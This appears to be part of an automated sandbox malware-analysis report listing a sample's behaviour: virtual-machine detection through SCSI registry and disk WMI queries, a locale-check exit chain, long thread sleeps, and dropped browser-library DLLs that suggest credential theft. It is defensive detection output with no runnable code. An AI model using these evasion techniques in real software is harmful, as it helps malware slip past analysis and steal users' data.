Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 1020, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_8-68075

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1390000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 5040000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe

Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1558	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2064	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4763	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1616	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4206	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4427	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3925
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2987
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 6468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 2357
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 839

Source: C:\Users\user\AppData\Local\Temp\i1.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_6-47492

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wygmbcpqogng	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\INetC.dll	Jump to dropped file
Source: C:\Windows\System32\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u2xs.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\System32\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u2xs.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\ApproveChildRequest.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\i1.exe	API coverage: 9.7 %
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API coverage: 7.9 %
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	API coverage: 1.7 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432	Thread sleep count: 1558 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6592	Thread sleep count: 2064 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6476	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2800	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2680	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3436	Thread sleep count: 4763 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636	Thread sleep count: 1616 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5556	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4688	Thread sleep count: 4206 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5328	Thread sleep count: 4427 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5312	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6108	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 736	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2820	Thread sleep count: 3925 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2820	Thread sleep count: 2987 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5028	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5564	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep count: 1530 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep count: 1457 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -43256s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -59832s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -58541s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -59671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -59548s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -31714s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -59411s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -59752s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -59264s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -59153s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -35846s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -59023s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -58889s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -30401s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -58778s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -58654s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -58531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -40036s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -58396s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -48436s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -58266s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -52124s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7584	Thread sleep time: -58121s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -41734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -55396s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -56372s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -38538s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -40366s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -39714s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -30047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -50580s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -38703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -46871s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -31201s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -51362s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -52072s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -41485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -34179s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -33993s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -42694s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -49103s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -40160s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -41544s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -34276s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -46584s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1684	Thread sleep time: -50598s >= -30000s
